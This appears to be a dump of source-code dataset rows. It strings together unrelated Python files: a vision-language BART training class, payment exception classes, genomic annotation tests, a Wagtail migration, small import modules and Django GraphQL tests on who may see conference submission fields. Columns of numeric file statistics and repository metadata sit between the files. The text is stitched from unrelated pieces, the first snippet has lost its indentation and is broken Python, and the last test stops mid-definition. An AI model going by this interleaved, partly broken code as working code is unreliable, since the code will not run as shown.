for task in self.losses:
if task_counts[task] > 0:
results[f'{task}_loss'] = task_loss[task]
results[f'{task}_loss_count'] = task_counts[task]
return results
@torch.no_grad()
def valid_step(self, batch):
self.eval()
device = next(self.parameters()).device
batch = self.vis_forward(batch, device)
vis_feats = batch['vis_feats'].to(device)
input_ids = batch['input_ids'].to(device)
vis_pos = batch['boxes'].to(device)
lm_labels = batch["target_ids"].to(device)
loss_weights = batch["loss_weights"].to(device)
output = self(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
labels=lm_labels,
return_dict=True
)
assert 'loss' in output
lm_mask = lm_labels != -100
lm_mask = lm_mask.float()
B, L = lm_labels.size()
loss = output['loss']
loss = loss.view(B, L) * lm_mask
loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B
results = {}
results['loss'] = (loss * loss_weights).mean()
results['total_loss'] = loss.detach().sum()
results['total_loss_count'] = len(loss)
task_counts = {task: 0 for task in self.losses}
task_loss = {task: 0 for task in self.losses}
for _loss, task in zip(loss.detach(), batch['task']):
task_loss[task] += _loss
task_counts[task] += 1
for task in self.losses:
if task_counts[task] > 0:
results[f'{task}_loss'] = task_loss[task]
results[f'{task}_loss_count'] = task_counts[task]
if 'qa' in self.losses:
output = self.generate(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
)
generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True)
results['qa_pred'] = generated_sents
return results
@torch.no_grad()
def generate_step(self, batch):
self.eval()
device = next(self.parameters()).device
batch = self.vis_forward(batch, device)
vis_feats = batch['vis_feats'].to(device)
input_ids = batch['input_ids'].to(device)
vis_pos = batch['boxes'].to(device)
vis_attention_mask = None
if 'vis_attention_mask' in batch:
vis_attention_mask = batch['vis_attention_mask'].to(device)
output = self.generate(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
vis_attention_mask=vis_attention_mask,
)
generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True)
return generated_sents
class DSVLBartPretraining(VLBart):
def __init__(self, config):
super().__init__(config)
self.losses = self.config.losses.split(',')
def forward(self, *args, **kwargs):
device = next(self.parameters()).device
batch = kwargs.get("batch")
train_mode = kwargs.get("train_mode")
batch = self.vis_forward(batch, device)
vis_feats = batch['vis_feats'].to(device)
input_ids = batch['input_ids'].to(device)
vis_pos = batch['boxes'].to(device)
lm_labels = batch["target_ids"].to(device)
loss_weights = batch["loss_weights"].to(device)
output = super().forward(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
labels=lm_labels,
return_dict=True
)
assert 'loss' in output
lm_mask = lm_labels != -100
lm_mask = lm_mask.float()
B, L = lm_labels.size()
loss = output['loss']
loss = loss.view(B, L) * lm_mask
loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B
task_counts = {task: 0 for task in self.losses}
task_loss = {task: 0 for task in self.losses}
results = {}
results['loss'] = (loss * loss_weights).mean()
results['total_loss'] = loss.detach().sum()
results['total_loss_count'] = len(loss)
task_counts = {task: 0 for task in self.losses}
task_loss = {task: 0 for task in self.losses}
for _loss, task in zip(loss.detach(), batch['task']):
task_loss[task] += _loss
task_counts[task] += 1
for task in self.losses:
if task_counts[task] > 0:
results[f'{task}_loss'] = task_loss[task]
results[f'{task}_loss_count'] = task_counts[task]
if not train_mode:
if 'qa' in self.losses:
output = self.generate(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
)
generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True)
results['qa_pred'] = generated_sents
return results
@torch.no_grad()
def generate_step(self, batch):
self.eval()
device = next(self.parameters()).device
batch = self.vis_forward(batch, device)
vis_feats = batch['vis_feats'].to(device)
input_ids = batch['input_ids'].to(device)
vis_pos = batch['boxes'].to(device)
vis_attention_mask = None
if 'vis_attention_mask' in batch:
vis_attention_mask = batch['vis_attention_mask'].to(device)
output = self.generate(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
vis_attention_mask=vis_attention_mask,
)
generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True)
return generated_sents
| 29.739454
| 95
| 0.575136
| 1,514
| 11,985
| 4.309115
| 0.06605
| 0.04905
| 0.055181
| 0.041845
| 0.949418
| 0.948804
| 0.940221
| 0.940221
| 0.940221
| 0.940221
| 0
| 0.007186
| 0.303296
| 11,985
| 403
| 96
| 29.739454
| 0.774132
| 0.01068
| 0
| 0.911032
| 0
| 0
| 0.067263
| 0
| 0
| 0
| 0
| 0
| 0.017794
| 1
| 0.039146
| false
| 0
| 0.021352
| 0
| 0.099644
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
385abe74ff6b310074d8a38dbe1b7a6acbc293e8
| 212
|
py
|
Python
|
pinpayments/exceptions.py
|
branchup/django-pinpayments
|
e342970c6309facf35b804de9994d326abaa094f
|
[
"Unlicense"
] | null | null | null |
pinpayments/exceptions.py
|
branchup/django-pinpayments
|
e342970c6309facf35b804de9994d326abaa094f
|
[
"Unlicense"
] | null | null | null |
pinpayments/exceptions.py
|
branchup/django-pinpayments
|
e342970c6309facf35b804de9994d326abaa094f
|
[
"Unlicense"
] | null | null | null |
"""
Contains exception types
"""
from __future__ import unicode_literals
class ConfigError(Exception):
""" Errors related to configuration """
class PinError(Exception):
""" Errors related to Pin """
| 16.307692
| 43
| 0.712264
| 22
| 212
| 6.636364
| 0.727273
| 0.205479
| 0.30137
| 0.328767
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174528
| 212
| 12
| 44
| 17.666667
| 0.834286
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
385b02c301ec18f738504980abcf084330ced6be
| 2,599
|
py
|
Python
|
tests/annotate_variants/test_add_annotations.py
|
Varstation/genmod
|
991a0fca36936b5dde49a95e8ea1d4336288c7c0
|
[
"MIT"
] | 46
|
2015-01-15T17:53:22.000Z
|
2021-08-09T09:35:29.000Z
|
tests/annotate_variants/test_add_annotations.py
|
Varstation/genmod
|
991a0fca36936b5dde49a95e8ea1d4336288c7c0
|
[
"MIT"
] | 55
|
2015-06-04T09:09:29.000Z
|
2021-05-20T10:48:18.000Z
|
tests/annotate_variants/test_add_annotations.py
|
moonso/genmod
|
99b6c9510ffc67fd54c07eab24de5db7345ef95d
|
[
"MIT"
] | 15
|
2015-02-06T04:08:23.000Z
|
2021-05-04T10:06:58.000Z
|
from genmod.annotate_variants.add_annotations import (add_regions, add_exac,
add_exac_max, add_thousandg, add_thousandg_max, add_spidex, add_cadd,
add_cadd_raw, add_cosmic)
def test_add_regions(header):
key = 'Annotation'
# GIVEN a header without key
assert key not in header.info_dict
# WHEN adding annotation
add_regions(header)
# THEN the key should have been added to the header
assert key in header.info_dict
def test_add_exac(header):
key = 'EXACAF'
# GIVEN a header without key
assert key not in header.info_dict
# WHEN adding annotation
add_exac(header)
# THEN the key should have been added to the header
assert key in header.info_dict
def test_add_exac_max(header):
key = 'EXAC_MAX_AF'
# GIVEN a header without key
assert key not in header.info_dict
# WHEN adding annotation
add_exac_max(header)
# THEN the key should have been added to the header
assert key in header.info_dict
def test_add_thousand_g(header):
key = '1000GAF'
# GIVEN a header without key
assert key not in header.info_dict
# WHEN adding annotation
add_thousandg(header)
# THEN the key should have been added to the header
assert key in header.info_dict
def test_add_thousand_g_max(header):
key = '1000G_MAX_AF'
# GIVEN a header without key
assert key not in header.info_dict
# WHEN adding annotation
add_thousandg_max(header)
# THEN the key should have been added to the header
assert key in header.info_dict
def test_add_spidex(header):
key = 'SPIDEX'
# GIVEN a header without key
assert key not in header.info_dict
# WHEN adding annotation
add_spidex(header)
# THEN the key should have been added to the header
assert key in header.info_dict
def test_add_cadd(header):
key = 'CADD'
# GIVEN a header without key
assert key not in header.info_dict
# WHEN adding annotation
add_cadd(header)
# THEN the key should have been added to the header
assert key in header.info_dict
def test_add_cadd_raw(header):
key = 'CADD_raw'
# GIVEN a header without key
assert key not in header.info_dict
# WHEN adding annotation
add_cadd_raw(header)
# THEN the key should have been added to the header
assert key in header.info_dict
def test_add_cosmic(header):
key = 'COSMIC'
# GIVEN a header without key
assert key not in header.info_dict
# WHEN adding annotation
add_cosmic(header)
# THEN the key should have been added to the header
assert key in header.info_dict
| 30.576471
| 77
| 0.716814
| 410
| 2,599
| 4.368293
| 0.104878
| 0.090452
| 0.120603
| 0.160804
| 0.815187
| 0.815187
| 0.815187
| 0.815187
| 0.815187
| 0.815187
| 0
| 0.004016
| 0.233551
| 2,599
| 84
| 78
| 30.940476
| 0.89508
| 0.345902
| 0
| 0.375
| 0
| 0
| 0.041866
| 0
| 0
| 0
| 0
| 0
| 0.375
| 1
| 0.1875
| false
| 0
| 0.020833
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
388697b71d2ffde59abf7e50bc8dea52dfbb96ff
| 5,545
|
py
|
Python
|
isi_mip/pages/migrations/0007_genericpage.py
|
ISI-MIP/isimip
|
c2a78c727337e38f3695031e00afd607da7d6dcb
|
[
"MIT"
] | 4
|
2017-07-05T08:06:18.000Z
|
2021-03-01T17:23:18.000Z
|
isi_mip/pages/migrations/0007_genericpage.py
|
ISI-MIP/isimip
|
c2a78c727337e38f3695031e00afd607da7d6dcb
|
[
"MIT"
] | 4
|
2020-01-31T09:02:57.000Z
|
2021-04-20T14:04:35.000Z
|
isi_mip/pages/migrations/0007_genericpage.py
|
ISI-MIP/isimip
|
c2a78c727337e38f3695031e00afd607da7d6dcb
|
[
"MIT"
] | 4
|
2017-10-12T01:48:55.000Z
|
2020-04-29T13:50:03.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-25 10:01
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import isi_mip.pages.blocks
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0028_merge'),
('pages', '0006_auto_20160425_1041'),
]
operations = [
migrations.CreateModel(
name='GenericPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('content', wagtail.core.fields.StreamField((('richtext', wagtail.core.blocks.RichTextBlock()), ('columns_1_to_1', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))))), ('right_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))), form_classname='pull-right'))))), ('columns_1_to_2', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))))), ('right_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))), form_classname='pull-right'))))), ('columns_2_to_1', wagtail.core.blocks.StructBlock((('left_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))))), ('right_column', wagtail.core.blocks.StreamBlock((('rich_text', wagtail.core.blocks.RichTextBlock()), ('link', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock(required=True)), ('picture', wagtail.images.blocks.ImageChooserBlock(required=False)), ('text', wagtail.core.blocks.RichTextBlock(required=False)), ('link', wagtail.core.blocks.URLBlock(required=False))))), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('faqs', wagtail.core.blocks.StructBlock((('title', wagtail.core.blocks.CharBlock()), ('faqs', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock((('question', wagtail.core.blocks.CharBlock()), ('answer', wagtail.core.blocks.RichTextBlock()))))))))), form_classname='pull-right'))))), ('image', isi_mip.pages.blocks.ImageBlock())))),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
]
| 163.088235
| 4,621
| 0.727142
| 628
| 5,545
| 6.356688
| 0.149682
| 0.217685
| 0.327906
| 0.147295
| 0.826403
| 0.826403
| 0.826403
| 0.826403
| 0.826403
| 0.826403
| 0
| 0.008133
| 0.068711
| 5,545
| 33
| 4,622
| 168.030303
| 0.764911
| 0.012083
| 0
| 0
| 1
| 0
| 0.120365
| 0.004201
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.307692
| 0
| 0.423077
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
3897bf4e50bd079352e559bee009816e5a6e71bd
| 98
|
py
|
Python
|
notifier/providers/__init__.py
|
kirelagin/pynotifier
|
4025a7954665e0d6c423510eebf7c692c01ff979
|
[
"BSD-3-Clause"
] | null | null | null |
notifier/providers/__init__.py
|
kirelagin/pynotifier
|
4025a7954665e0d6c423510eebf7c692c01ff979
|
[
"BSD-3-Clause"
] | null | null | null |
notifier/providers/__init__.py
|
kirelagin/pynotifier
|
4025a7954665e0d6c423510eebf7c692c01ff979
|
[
"BSD-3-Clause"
] | null | null | null |
from notifier.providers.print import PrintNotify
from notifier.providers.email import EmailNotify
| 32.666667
| 48
| 0.877551
| 12
| 98
| 7.166667
| 0.666667
| 0.27907
| 0.488372
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 98
| 2
| 49
| 49
| 0.955556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
3899721aa8fca9877f7a38c0c3dbe93129013b37
| 184
|
py
|
Python
|
yarx/data/__init__.py
|
mahnerak/yarx
|
aff3f98714fe940966e6e1ad670e10c059d49985
|
[
"Apache-2.0"
] | 1
|
2019-08-27T17:38:37.000Z
|
2019-08-27T17:38:37.000Z
|
yarx/data/__init__.py
|
mahnerak/yarx
|
aff3f98714fe940966e6e1ad670e10c059d49985
|
[
"Apache-2.0"
] | null | null | null |
yarx/data/__init__.py
|
mahnerak/yarx
|
aff3f98714fe940966e6e1ad670e10c059d49985
|
[
"Apache-2.0"
] | 1
|
2019-08-18T18:05:07.000Z
|
2019-08-18T18:05:07.000Z
|
from .dataset_readers import FilterConllCorefReader
from .dataset_readers import SciERCReader
from .dataset_readers import BioRelExDatasetReader
from .fields import OptionalListField
| 30.666667
| 51
| 0.88587
| 19
| 184
| 8.421053
| 0.473684
| 0.20625
| 0.3375
| 0.45
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092391
| 184
| 5
| 52
| 36.8
| 0.958084
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2a085e1493832e351bcf29f6f07f6293786b43a3
| 115
|
py
|
Python
|
solutions/python/algorithm/test_add_two_numbers.py
|
pojozhang/playground
|
d57786e990c218d6e97da034d0eb4723f05c2ba2
|
[
"MIT"
] | 6
|
2018-04-12T10:13:40.000Z
|
2019-02-12T06:32:16.000Z
|
solutions/python/algorithm/test_add_two_numbers.py
|
pojozhang/park
|
81b84bdfb5ff81c4a276691805ef3f718bde4d32
|
[
"MIT"
] | 19
|
2019-08-11T15:15:53.000Z
|
2021-02-17T19:13:25.000Z
|
solutions/python/algorithm/test_add_two_numbers.py
|
pojozhang/park
|
81b84bdfb5ff81c4a276691805ef3f718bde4d32
|
[
"MIT"
] | 3
|
2018-04-12T10:14:40.000Z
|
2019-07-15T08:41:27.000Z
|
from add_two_numbers import *
def test_add_two_numbers_case_1():
assert two_sum([2, 7, 11, 15], 9) == [0, 1]
| 19.166667
| 47
| 0.669565
| 22
| 115
| 3.136364
| 0.772727
| 0.173913
| 0.376812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 0.182609
| 115
| 5
| 48
| 23
| 0.62766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2a288d7c4f333737c2f187a8c158e9ff591a0681
| 13,508
|
py
|
Python
|
backend/api/submissions/tests/test_submission_fields.py
|
patrick91/pycon
|
9d7e15f540adcf0eaceb61fdbf67206d6aef73ec
|
[
"MIT"
] | 2
|
2017-07-18T21:51:25.000Z
|
2017-12-23T11:08:39.000Z
|
backend/api/submissions/tests/test_submission_fields.py
|
patrick91/pycon
|
9d7e15f540adcf0eaceb61fdbf67206d6aef73ec
|
[
"MIT"
] | 23
|
2017-07-18T20:22:38.000Z
|
2018-01-05T05:45:15.000Z
|
backend/api/submissions/tests/test_submission_fields.py
|
patrick91/pycon
|
9d7e15f540adcf0eaceb61fdbf67206d6aef73ec
|
[
"MIT"
] | 2
|
2017-07-18T21:27:33.000Z
|
2017-07-18T22:07:03.000Z
|
import pytest
from schedule.models import ScheduleItem
pytestmark = pytest.mark.django_db
QUERY = """
query SubmissionQuery($id: ID!) {
submission(id: $id) {
abstract
audienceLevel {
name
}
elevatorPitch
id
type {
name
}
topic {
name
}
title
tags {
name
}
speakerLevel
slug
previousTalkVideo
notes
languages {
code
}
duration {
name
}
conference {
code
}
}
}
"""
@pytest.fixture
def other_user(user_factory):
return user_factory()
def _submission(submission_factory, user, **kwargs):
return submission_factory(
speaker_id=user.id, languages=("it", "en"), tags=("python", "GraphQL"), **kwargs
)
def _query(graphql_client, submission):
response = graphql_client.query(
QUERY,
variables={"id": submission.hashid},
)
assert not response.get("errors")
return response["data"]
def test_voting_open_and_user_cannot_vote(
graphql_client, submission_factory, user, other_user, mocker
):
submission = _submission(submission_factory, user)
graphql_client.force_login(other_user)
can_vote_mock = mocker.patch(
"api.submissions.permissions.pastaporto_user_info_can_vote", return_value=False
)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ❌ restricted
assert data["submission"]["elevatorPitch"] is None
assert data["submission"]["abstract"] is None
assert data["submission"]["topic"] is None
assert data["submission"]["type"] is None
assert data["submission"]["duration"] is None
assert data["submission"]["audienceLevel"] is None
assert data["submission"]["languages"] is None
assert data["submission"]["tags"] is None
# ❌ private
assert data["submission"]["speakerLevel"] is None
assert data["submission"]["previousTalkVideo"] is None
assert data["submission"]["notes"] is None
can_vote_mock.assert_called()
def test_voting_open_and_user_can_vote(
graphql_client, submission_factory, user, other_user, mocker
):
submission = _submission(submission_factory, user)
graphql_client.force_login(other_user)
can_vote_mock = mocker.patch(
"api.submissions.permissions.pastaporto_user_info_can_vote", return_value=True
)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ✔️ restricted
assert data["submission"]["elevatorPitch"] == submission.elevator_pitch
assert data["submission"]["abstract"] == submission.abstract
assert data["submission"]["topic"]["name"] == submission.topic.name
assert data["submission"]["type"]["name"] == submission.type.name
assert data["submission"]["duration"]["name"] == submission.duration.name
assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name
assert data["submission"]["languages"] == [
{"code": "it"},
{"code": "en"},
]
assert data["submission"]["tags"] == [
{"name": "python"},
{"name": "GraphQL"},
]
# ❌ private
assert data["submission"]["speakerLevel"] is None
assert data["submission"]["previousTalkVideo"] is None
assert data["submission"]["notes"] is None
can_vote_mock.assert_called()
def test_voring_closed_and_user_is_authenticated(
graphql_client, other_user, submission_factory, user
):
submission = _submission(submission_factory, user, conference__active_voting=False)
graphql_client.force_login(other_user)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ❌ restricted
assert data["submission"]["elevatorPitch"] is None
assert data["submission"]["abstract"] is None
assert data["submission"]["topic"] is None
assert data["submission"]["type"] is None
assert data["submission"]["duration"] is None
assert data["submission"]["audienceLevel"] is None
assert data["submission"]["languages"] is None
assert data["submission"]["tags"] is None
# ❌ private
assert data["submission"]["speakerLevel"] is None
assert data["submission"]["previousTalkVideo"] is None
assert data["submission"]["notes"] is None
def test_voring_closed_and_user_is_not_authenticated(
graphql_client, submission_factory, user
):
submission = _submission(submission_factory, user, conference__active_voting=False)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ❌ restricted
assert data["submission"]["elevatorPitch"] is None
assert data["submission"]["abstract"] is None
assert data["submission"]["topic"] is None
assert data["submission"]["type"] is None
assert data["submission"]["duration"] is None
assert data["submission"]["audienceLevel"] is None
assert data["submission"]["languages"] is None
assert data["submission"]["tags"] is None
# ❌ private
assert data["submission"]["speakerLevel"] is None
assert data["submission"]["previousTalkVideo"] is None
assert data["submission"]["notes"] is None
def test_accepted_submission_user_can_see_public_and_restricted_fields(
graphql_client, submission_factory, user, schedule_item_factory
):
submission = _submission(submission_factory, user)
schedule_item_factory(
submission=submission,
conference=submission.conference,
type=ScheduleItem.TYPES.submission,
)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ✔️ restricted
assert data["submission"]["elevatorPitch"] == submission.elevator_pitch
assert data["submission"]["abstract"] == submission.abstract
assert data["submission"]["topic"]["name"] == submission.topic.name
assert data["submission"]["type"]["name"] == submission.type.name
assert data["submission"]["duration"]["name"] == submission.duration.name
assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name
assert data["submission"]["languages"] == [
{"code": "it"},
{"code": "en"},
]
assert data["submission"]["tags"] == [
{"name": "python"},
{"name": "GraphQL"},
]
# ❌ private
assert data["submission"]["speakerLevel"] is None
assert data["submission"]["previousTalkVideo"] is None
assert data["submission"]["notes"] is None
def test_admin_user_can_see_everything(
graphql_client, admin_user, submission_factory, user
):
submission = _submission(submission_factory, user)
graphql_client.force_login(admin_user)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ✔️ restricted
assert data["submission"]["elevatorPitch"] == submission.elevator_pitch
assert data["submission"]["abstract"] == submission.abstract
assert data["submission"]["topic"]["name"] == submission.topic.name
assert data["submission"]["type"]["name"] == submission.type.name
assert data["submission"]["duration"]["name"] == submission.duration.name
assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name
assert data["submission"]["languages"] == [
{"code": "it"},
{"code": "en"},
]
assert data["submission"]["tags"] == [
{"name": "python"},
{"name": "GraphQL"},
]
# ✔️ private
assert data["submission"]["speakerLevel"] == submission.speaker_level
assert data["submission"]["previousTalkVideo"] == submission.previous_talk_video
assert data["submission"]["notes"] == submission.notes
def test_submission_author_can_see_everything(graphql_client, submission_factory, user):
submission = _submission(submission_factory, user)
graphql_client.force_login(user)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ✔️ restricted
assert data["submission"]["elevatorPitch"] == submission.elevator_pitch
assert data["submission"]["abstract"] == submission.abstract
assert data["submission"]["topic"]["name"] == submission.topic.name
assert data["submission"]["type"]["name"] == submission.type.name
assert data["submission"]["duration"]["name"] == submission.duration.name
assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name
assert data["submission"]["languages"] == [
{"code": "it"},
{"code": "en"},
]
assert data["submission"]["tags"] == [
{"name": "python"},
{"name": "GraphQL"},
]
# ✔️ private
assert data["submission"]["speakerLevel"] == submission.speaker_level
assert data["submission"]["previousTalkVideo"] == submission.previous_talk_video
assert data["submission"]["notes"] == submission.notes
def test_ranked_submission_user_can_see_public_and_restricted_fields(
graphql_client,
conference,
user,
submission_factory,
rank_request_factory,
mocker,
):
mocker.patch("voting.models.ranking.get_users_data_by_ids", return_value={})
submission = _submission(submission_factory, user=user, conference=conference)
rank_request_factory(
conference=conference, submissions=[submission], is_public=True
)
data = _query(graphql_client, submission)
# ✔️ public
assert data["submission"]["title"] == submission.title
assert data["submission"]["slug"] == submission.slug
# ✔️ restricted
assert data["submission"]["elevatorPitch"] == submission.elevator_pitch
assert data["submission"]["abstract"] == submission.abstract
assert data["submission"]["topic"]["name"] == submission.topic.name
assert data["submission"]["type"]["name"] == submission.type.name
assert data["submission"]["duration"]["name"] == submission.duration.name
assert data["submission"]["audienceLevel"]["name"] == submission.audience_level.name
assert data["submission"]["languages"] == [
{"code": "it"},
{"code": "en"},
]
assert data["submission"]["tags"] == [
{"name": "python"},
{"name": "GraphQL"},
]
# ❌ private
assert data["submission"]["speakerLevel"] is None
assert data["submission"]["previousTalkVideo"] is None
assert data["submission"]["notes"] is None
def test_ranking_is_not_public_cannot_see_restricted_and_private_fields(
graphql_client, rank_request_factory, conference, user, submission_factory, mocker
):
